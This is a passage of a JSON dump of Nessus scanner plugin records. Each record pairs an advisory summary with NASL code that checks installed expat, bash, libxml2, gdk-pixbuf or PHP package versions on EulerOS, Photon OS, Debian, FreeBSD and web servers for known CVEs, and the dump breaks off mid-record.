{"nessus": [{"lastseen": "2019-11-01T02:06:28", "bulletinFamily": "scanner", "description": "According to the version of the expat packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - An out-of-bounds read flaw was found in the way Expat\n processed certain input. A remote attacker could send\n specially crafted XML that, when parsed by an\n application using the Expat library, would cause that\n application to crash or, possibly, execute arbitrary\n code with the permission of the user running the\n application.(CVE-2016-0718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1446.NASL", "href": "https://www.tenable.com/plugins/nessus/124949", "published": "2019-05-14T00:00:00", "title": "EulerOS Virtualization 3.0.1.0 : expat (EulerOS-SA-2019-1446)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124949);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/06/27 13:33:25\");\n\n script_cve_id(\n \"CVE-2016-0718\"\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : expat (EulerOS-SA-2019-1446)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the expat packages installed, the EulerOS\nVirtualization installation on the remote host is affected by the\nfollowing vulnerability :\n\n - An out-of-bounds read flaw was found in the way Expat\n processed certain input. 
A remote attacker could send\n specially crafted XML that, when parsed by an\n application using the Expat library, would cause that\n application to crash or, possibly, execute arbitrary\n code with the permission of the user running the\n application.(CVE-2016-0718)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1446\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c2493683\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected expat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:expat-static\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"expat-2.1.0-10.h1\",\n \"expat-devel-2.1.0-10.h1\",\n \"expat-static-2.1.0-10.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"expat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:09:01", "bulletinFamily": "scanner", "description": "An update of the bash package has been released.", "modified": "2019-11-02T00:00:00", "id": "PHOTONOS_PHSA-2017-0040_BASH.NASL", "href": "https://www.tenable.com/plugins/nessus/121741", "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Bash PHSA-2017-0040", "type": "nessus", 
"sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0040. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121741);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2019/02/07 18:14:47\");\n\n script_cve_id(\"CVE-2016-0634\");\n\n script_name(english:\"Photon OS 1.0: Bash PHSA-2017-0040\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the bash package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-80.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10309\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"bash-4.3.48-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"bash-debuginfo-4.3.48-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"bash-lang-4.3.48-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:08:58", "bulletinFamily": "scanner", "description": "An update of the libxml2 package has been released.", "modified": "2019-11-02T00:00:00", "id": "PHOTONOS_PHSA-2017-0001_LIBXML2.NASL", "href": "https://www.tenable.com/plugins/nessus/121663", "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Libxml2 PHSA-2017-0001", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package 
checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0001. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121663);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/03/28 10:07:15\");\n\n script_cve_id(\"CVE-2016-9318\");\n\n script_name(english:\"Photon OS 1.0: Libxml2 PHSA-2017-0001\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the libxml2 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-16.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-10009\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"libxml2-2.9.4-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"libxml2-debuginfo-2.9.4-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"libxml2-devel-2.9.4-3.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"libxml2-python-2.9.4-3.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:18:32", "bulletinFamily": "scanner", "description": "The patch introduced in DLA-1234-1 had a problem that caused\ngdk-pixbuf", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DLA-1234.NASL", "href": "https://www.tenable.com/plugins/nessus/105661", "published": "2018-01-09T00:00:00", "title": "Debian DLA-1234-2 : gdk-pixbuf regression update", 
"type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1234-2. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105661);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2018/01/10 15:14:44 $\");\n\n script_name(english:\"Debian DLA-1234-2 : gdk-pixbuf regression update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The patch introduced in DLA-1234-1 had a problem that caused\ngdk-pixbuf's gif module to fail to load.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version\n2.26.1-1+deb7u8.\n\nWe recommend that you upgrade your gdk-pixbuf packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/01/msg00009.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/gdk-pixbuf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gir1.2-gdkpixbuf-2.0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgdk-pixbuf2.0-0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgdk-pixbuf2.0-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgdk-pixbuf2.0-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgdk-pixbuf2.0-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 
(!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"gir1.2-gdkpixbuf-2.0\", reference:\"2.26.1-1+deb7u8\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgdk-pixbuf2.0-0\", reference:\"2.26.1-1+deb7u8\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgdk-pixbuf2.0-common\", reference:\"2.26.1-1+deb7u8\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgdk-pixbuf2.0-dev\", reference:\"2.26.1-1+deb7u8\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgdk-pixbuf2.0-doc\", reference:\"2.26.1-1+deb7u8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-11-01T02:38:42", "bulletinFamily": "scanner", "description": "libxml2 developers report :\n\nThe htmlParseTryOrFinish function in HTMLparser.c in libxml2 2.9.4\nallows attackers to cause a denial of service (buffer over-read) or\ninformation disclosure.\n\nA buffer overflow was discovered in libxml2\n20904-GITv2.9.4-16-g0741801. 
The function xmlSnprintfElementContent in\nvalid.c is supposed to recursively dump the element content definition\ninto a char buffer ", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_76E59F554F7A4887BCB011604004163A.NASL", "href": "https://www.tenable.com/plugins/nessus/105216", "published": "2017-12-14T00:00:00", "title": "FreeBSD : libxml2 -- Multiple Issues (76e59f55-4f7a-4887-bcb0-11604004163a)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105216);\n script_version(\"3.4\");\n script_cvs_date(\"Date: 2018/11/21 10:46:31\");\n\n script_cve_id(\"CVE-2017-8872\", \"CVE-2017-9047\", \"CVE-2017-9048\", \"CVE-2017-9049\", \"CVE-2017-9050\");\n\n script_name(english:\"FreeBSD : libxml2 -- Multiple Issues (76e59f55-4f7a-4887-bcb0-11604004163a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libxml2 developers report :\n\nThe htmlParseTryOrFinish function in HTMLparser.c in libxml2 2.9.4\nallows attackers to cause a denial of service (buffer over-read) or\ninformation disclosure.\n\nA buffer overflow was discovered in libxml2\n20904-GITv2.9.4-16-g0741801. The function xmlSnprintfElementContent in\nvalid.c is supposed to recursively dump the element content definition\ninto a char buffer 'buf' of size 'size'. The variable len is assigned\nstrlen(buf). If the content->type is XML_ELEMENT_CONTENT_ELEMENT, then\n(i) the content->prefix is appended to buf (if it actually fits)\nwhereupon (ii) content->name is written to the buffer. However, the\ncheck for whether the content->name actually fits also uses 'len'\nrather than the updated buffer length strlen(buf). 
This allows us to\nwrite about 'size' many bytes beyond the allocated memory. This\nvulnerability causes programs that use libxml2, such as PHP, to crash.\n\nlibxml2 20904-GITv2.9.4-16-g0741801 is vulnerable to a stack-based\nbuffer overflow. The function xmlSnprintfElementContent in valid.c is\nsupposed to recursively dump the element content definition into a\nchar buffer 'buf' of size 'size'. At the end of the routine, the\nfunction may strcat two more characters without checking whether the\ncurrent strlen(buf) + 2 < size. This vulnerability causes programs\nthat use libxml2, such as PHP, to crash.\n\nlibxml2 20904-GITv2.9.4-16-g0741801 is vulnerable to a heap-based\nbuffer over-read in the xmlDictComputeFastKey function in dict.c. This\nvulnerability causes programs that use libxml2, such as PHP, to crash.\nThis vulnerability exists because of an incomplete fix for libxml2 Bug\n759398.\n\nlibxml2 20904-GITv2.9.4-16-g0741801 is vulnerable to a heap-based\nbuffer over-read in the xmlDictAddString function in dict.c. 
This\nvulnerability causes programs that use libxml2, such as PHP, to crash.\nThis vulnerability exists because of an incomplete fix for\nCVE-2016-1839.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.gnome.org/show_bug.cgi?id=775200\"\n );\n # http://www.openwall.com/lists/oss-security/2017/05/15/1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2017/05/15/1\"\n );\n # http://www.securityfocus.com/bid/98599\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/bid/98599\"\n );\n # http://www.openwall.com/lists/oss-security/2017/05/15/1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2017/05/15/1\"\n );\n # http://www.securityfocus.com/bid/98556\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/bid/98556\"\n );\n # http://www.openwall.com/lists/oss-security/2017/05/15/1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2017/05/15/1\"\n );\n # http://www.securityfocus.com/bid/98601\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/bid/98601\"\n );\n # http://www.openwall.com/lists/oss-security/2017/05/15/1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openwall.com/lists/oss-security/2017/05/15/1\"\n );\n # http://www.securityfocus.com/bid/98568\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.securityfocus.com/bid/98568\"\n );\n # https://vuxml.freebsd.org/freebsd/76e59f55-4f7a-4887-bcb0-11604004163a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fff120c8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n 
script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"libxml2<=2.9.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2019-11-17T19:18:50", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP running on the remote \nweb server is 7.1.x prior to 7.1.11. 
It is, therefore, affected by \nmultiple vulnerabilities.", "modified": "2019-11-02T00:00:00", "id": "PHP_7_1_11.NASL", "href": "https://www.tenable.com/plugins/nessus/104633", "published": "2017-11-16T00:00:00", "title": "PHP 7.1.x < 7.1.11 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104633);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2016-1283\", \"CVE-2017-16642\");\n script_bugtraq_id(79825, 101745);\n\n script_name(english:\"PHP 7.1.x < 7.1.11 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote \nweb server is 7.1.x prior to 7.1.11. 
It is, therefore, affected by \nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-7.php#7.1.11\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 7.1.11 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1283\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
